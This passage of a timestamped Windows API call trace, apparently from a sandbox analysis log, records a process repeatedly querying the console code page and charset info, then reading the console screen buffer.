lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.847] GetConsoleOutputCP () returned 0x1b5 [0156.847] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.847] GetConsoleOutputCP () returned 0x1b5 [0156.847] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.847] GetConsoleOutputCP () returned 0x1b5 [0156.848] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.848] GetConsoleOutputCP () returned 0x1b5 [0156.848] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.848] GetConsoleOutputCP () returned 0x1b5 [0156.848] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.848] GetConsoleOutputCP () returned 0x1b5 [0156.849] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.849] GetConsoleOutputCP () returned 0x1b5 [0156.849] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.849] GetConsoleOutputCP () returned 0x1b5 [0156.849] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.849] GetConsoleOutputCP () returned 0x1b5 [0156.849] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.849] GetConsoleOutputCP () returned 0x1b5 [0156.850] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.850] GetConsoleOutputCP () returned 0x1b5 [0156.850] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.850] GetConsoleOutputCP () returned 0x1b5 [0156.850] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.850] GetConsoleOutputCP () returned 0x1b5 [0156.851] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.851] GetConsoleOutputCP () returned 0x1b5 [0156.851] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.851] GetConsoleOutputCP () returned 0x1b5 [0156.851] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.851] GetConsoleOutputCP () returned 0x1b5 [0156.852] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.852] GetConsoleOutputCP () returned 0x1b5 [0156.852] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.852] GetConsoleOutputCP () returned 0x1b5 [0156.852] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.852] GetConsoleOutputCP () returned 0x1b5 [0156.852] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.852] GetConsoleOutputCP () returned 0x1b5 [0156.853] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.853] GetConsoleOutputCP () returned 0x1b5 [0156.853] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.853] GetConsoleOutputCP () returned 0x1b5 [0156.853] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.853] GetConsoleOutputCP () returned 0x1b5 [0156.854] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.854] GetConsoleOutputCP () returned 0x1b5 [0156.854] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.854] GetConsoleOutputCP () returned 0x1b5 [0156.854] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.854] GetConsoleOutputCP () returned 0x1b5 [0156.854] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.855] GetConsoleOutputCP () returned 0x1b5 [0156.855] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.855] GetConsoleOutputCP () returned 0x1b5 [0156.855] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.855] GetConsoleOutputCP () returned 0x1b5 [0156.855] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.855] GetConsoleOutputCP () returned 0x1b5 [0156.856] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.856] GetConsoleOutputCP () returned 0x1b5 [0156.856] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.856] GetConsoleOutputCP () returned 0x1b5 [0156.857] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.857] GetConsoleOutputCP () returned 0x1b5 [0156.857] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.857] GetConsoleOutputCP () returned 0x1b5 [0156.857] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.857] GetConsoleOutputCP () returned 0x1b5 [0156.857] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.857] GetConsoleOutputCP () returned 0x1b5 [0156.858] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.858] GetConsoleOutputCP () returned 0x1b5 [0156.858] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.858] GetConsoleOutputCP () returned 0x1b5 [0156.858] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.858] GetConsoleOutputCP () returned 0x1b5 [0156.859] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.859] GetConsoleOutputCP () returned 0x1b5 [0156.859] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.859] GetConsoleOutputCP () returned 0x1b5 [0156.859] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.859] GetConsoleOutputCP () returned 0x1b5 [0156.859] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.860] GetConsoleOutputCP () returned 0x1b5 [0156.860] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.860] GetConsoleOutputCP () returned 0x1b5 [0156.860] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.860] GetConsoleOutputCP () returned 0x1b5 [0156.860] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.860] GetConsoleOutputCP () returned 0x1b5 [0156.861] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.861] GetConsoleOutputCP () returned 0x1b5 [0156.861] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.861] GetConsoleOutputCP () returned 0x1b5 [0156.861] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.861] GetConsoleOutputCP () returned 0x1b5 [0156.862] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.862] GetConsoleOutputCP () returned 0x1b5 [0156.862] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.862] GetConsoleOutputCP () returned 0x1b5 [0156.862] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.862] GetConsoleOutputCP () returned 0x1b5 [0156.862] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.863] GetConsoleOutputCP () returned 0x1b5 [0156.863] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.863] GetConsoleOutputCP () returned 0x1b5 [0156.863] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.863] GetConsoleOutputCP () returned 0x1b5 [0156.863] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.863] GetConsoleOutputCP () returned 0x1b5 [0156.864] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.864] GetConsoleOutputCP () returned 0x1b5 [0156.864] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.864] GetConsoleOutputCP () returned 0x1b5 [0156.864] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.864] GetConsoleOutputCP () returned 0x1b5 [0156.865] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.865] GetConsoleOutputCP () returned 0x1b5 [0156.865] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.865] GetConsoleOutputCP () returned 0x1b5 [0156.865] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.865] GetConsoleOutputCP () returned 0x1b5 [0156.865] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.865] GetConsoleOutputCP () returned 0x1b5 [0156.866] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.866] GetConsoleOutputCP () returned 0x1b5 [0156.866] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.866] GetConsoleOutputCP () returned 0x1b5 [0156.866] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.866] GetConsoleOutputCP () returned 0x1b5 [0156.867] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.867] GetConsoleOutputCP () returned 0x1b5 [0156.867] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.867] GetConsoleOutputCP () returned 0x1b5 [0156.867] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.867] GetConsoleOutputCP () returned 0x1b5 [0156.868] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.868] GetConsoleOutputCP () returned 0x1b5 [0156.868] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.868] GetConsoleOutputCP () returned 0x1b5 [0156.868] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.868] GetConsoleOutputCP () returned 0x1b5 [0156.868] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.868] GetConsoleOutputCP () returned 0x1b5 [0156.869] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.869] GetConsoleOutputCP () returned 0x1b5 [0156.869] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.869] GetConsoleOutputCP () returned 0x1b5 [0156.869] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.869] GetConsoleOutputCP () returned 0x1b5 [0156.870] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.870] GetConsoleOutputCP () returned 0x1b5 [0156.870] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.870] GetConsoleOutputCP () returned 0x1b5 [0156.870] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.870] GetConsoleOutputCP () returned 0x1b5 [0156.871] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.871] GetConsoleOutputCP () returned 0x1b5 [0156.871] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.871] GetConsoleOutputCP () returned 0x1b5 [0156.872] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.872] GetConsoleOutputCP () returned 0x1b5 [0156.872] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.872] GetConsoleOutputCP () returned 0x1b5 [0156.873] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.873] GetConsoleOutputCP () returned 0x1b5 [0156.873] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.873] GetConsoleOutputCP () returned 0x1b5 [0156.873] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.873] GetConsoleOutputCP () returned 0x1b5 [0156.873] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.873] GetConsoleOutputCP () returned 0x1b5 [0156.874] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.874] GetConsoleOutputCP () returned 0x1b5 [0156.874] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.874] GetConsoleOutputCP () returned 0x1b5 [0156.874] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.874] GetConsoleOutputCP () returned 0x1b5 [0156.875] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.875] GetConsoleOutputCP () returned 0x1b5 [0156.875] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.875] GetConsoleOutputCP () returned 0x1b5 [0156.875] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.875] GetConsoleOutputCP () returned 0x1b5 [0156.875] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.876] GetConsoleOutputCP () returned 0x1b5 [0156.876] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.876] GetConsoleOutputCP () returned 0x1b5 [0156.876] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.876] GetConsoleOutputCP () returned 0x1b5 [0156.876] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.876] GetConsoleOutputCP () returned 0x1b5 [0156.877] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.877] GetConsoleOutputCP () returned 0x1b5 [0156.877] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.877] GetConsoleOutputCP () returned 0x1b5 [0156.877] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.877] GetConsoleOutputCP () returned 0x1b5 [0156.878] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.878] GetConsoleOutputCP () returned 0x1b5 [0156.878] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.878] GetConsoleOutputCP () returned 0x1b5 [0156.878] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.878] GetConsoleOutputCP () returned 0x1b5 [0156.878] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.878] GetConsoleOutputCP () returned 0x1b5 [0156.879] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.879] GetConsoleOutputCP () returned 0x1b5 [0156.879] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.879] GetConsoleOutputCP () returned 0x1b5 [0156.879] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.879] GetConsoleOutputCP () returned 0x1b5 [0156.880] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.880] GetConsoleOutputCP () returned 0x1b5 [0156.880] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.880] GetConsoleOutputCP () returned 0x1b5 [0156.880] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.880] GetConsoleOutputCP () returned 0x1b5 [0156.880] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.881] GetConsoleOutputCP () returned 0x1b5 [0156.881] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.881] GetConsoleOutputCP () returned 0x1b5 [0156.881] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.881] GetConsoleOutputCP () returned 0x1b5 [0156.881] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.881] GetConsoleOutputCP () returned 0x1b5 [0156.882] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.882] GetConsoleOutputCP () returned 0x1b5 [0156.882] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.882] GetConsoleOutputCP () returned 0x1b5 [0156.882] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.883] GetConsoleOutputCP () returned 0x1b5 [0156.883] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.883] GetConsoleOutputCP () returned 0x1b5 [0156.883] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.883] GetConsoleOutputCP () returned 0x1b5 [0156.884] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.884] GetConsoleOutputCP () returned 0x1b5 [0156.884] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.884] GetConsoleOutputCP () returned 0x1b5 [0156.884] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.931] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d158 | out: lpConsoleScreenBufferInfo=0xb156f8d158) returned 1 [0156.932] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d108 | out: lpConsoleScreenBufferInfo=0xb156f8d108) returned 1 [0156.933] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0156.933] ReadConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpReadRegion=0xb156f8d030 | out: 